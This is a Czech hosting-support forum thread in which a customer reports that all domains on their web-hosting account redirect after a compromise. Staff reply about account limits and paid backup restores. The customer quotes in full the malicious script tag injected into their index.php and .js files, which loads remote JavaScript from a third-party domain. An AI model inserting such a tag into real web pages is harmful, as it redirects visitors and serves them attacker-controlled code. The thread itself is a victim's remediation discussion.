Všechny domény na hostingu přesměrovány
Dobrý den,
dnes jsem si všiml, že veškeré domény pod mým webhostingem jsou přesměrovány zásahem třetí strany. Chtěl bych se zeptat, jestli je chyba na mé či Vaší straně a případně kde může být problém. A jak nejlépe toto vyřešit a postarat se o to, aby se to již neopakovalo. Mockrát děkuji za odpověď a případnou asistenci.
S pozdravem,
Špaček
8 Answers
Dobrý den,
to bohužel na klasickém webhostingu nelze. Toto je možné pouze u WMS, kdy si nevytváříte multihosting ale pro každý web si vytvoříte vlastní webhosting -> https://www.wedos.cz/wms
Tak jsem se už prokousal alespoň jedním webem, který se mi podařilo redirectu zbavit. Přes 100 .js souborů mělo injectnuto redirect. Samozřejmě cílem je minimalizovat riziko opakování zálohami a novými hesly. Avšak chtěl bych se zeptat, jestli je možné zamezit aliasům přistupovat do jiných složek než přímo jejich. Jelikož kvůli tomu, že přístupová práva mezi složkami aliasů nejspíš nejsou řešena nakazil jeden web úplně všechny. Děkuji za odpověď.
Dalsi poznatek je, ze cely redirect zpusobuje nejaky javascript (kdyz ho vypnu v prohliceci, vse vali). Nejaky zpusob jak relativne jednoduse odkrokovat nacitani aby se ukazalo kde a jaky javascript redirect zpusobi? Dekuju za rady.
Tak jsem zkusil udělat čistou instalaci WP. Původně to vypadalo, že všechny index.php byly napadeny s vložením „<script type=’text/javascript‘ src=’https://stat.trackstatisticsss.com/k.js?v=222′></script>“. Na tento web je vše přesměrováno. Bohužel po odstranění scriptu se nedaří problém odstranit. Po čisté instalaci WP základní stránka funguje, avšak po zadání www.doména.cz/wp-admin se opět přesměruje (mělo by to přeci tahat vše z nové instalaci a především svého složky v /domains.
Dle datumů úprav souborů na FTP jsou to index.php. Opravím si je, ale chtěl bych se zeptat jestli máte nějakou možnost zjistit jak k útoku došlo, či jak mu v budoucnu zabránit. Změním heslo všech FTP účtů, ale pokud máte jiné tipy k tomu rád si je přečtu. Děkuji.
Dobrý den,
z naší strany je obnova ze zálohy možná. Avšak je možné, že již záloha obsahuje napadený web.
Obnova ze zálohy u webhostingu NoLimit a služeb VPS je zpoplatněna částkou 500 CZK bez DPH, u NoLimit EXTRA je obnova zdarma.
Pokud souhlasíte s cenou sdělte nám následující informace skrze kontaktní formulář (https://hosting.wedos.com/cs/cform.html):
1) Název služby:
2) Záloha FTP, DB (název), oboje:
3) Z jakého dne zálohu požadujete (přesný datum zálohy upřesní technik):
4) Způsob obnovy (a/b):
a) Přepsat všechny současné data na FTP daty ze zálohy (export databáze bude umístěn na FTP)
b) Nahrát data ze zálohy do samostatné složky na FTP
Stejné přesměrování se týká všech domén pod tímto účtem. Tedy by to vypadalo na hacknutý FTP účet? Něco jede na WordPressu ale něco ne, přitom chyba stejný. Na plug-in bych to tedy neviděl. Zálohy webů v nynější podobě nemám. Předpokládal jsem, že pro tyto případy běží nějaký zálohovací systém na Vaší straně a je možné rollback na „relativně nedávnou“ verzi webu? Možnost otestovat hosting antivirem jsem nikde na webu nenašel.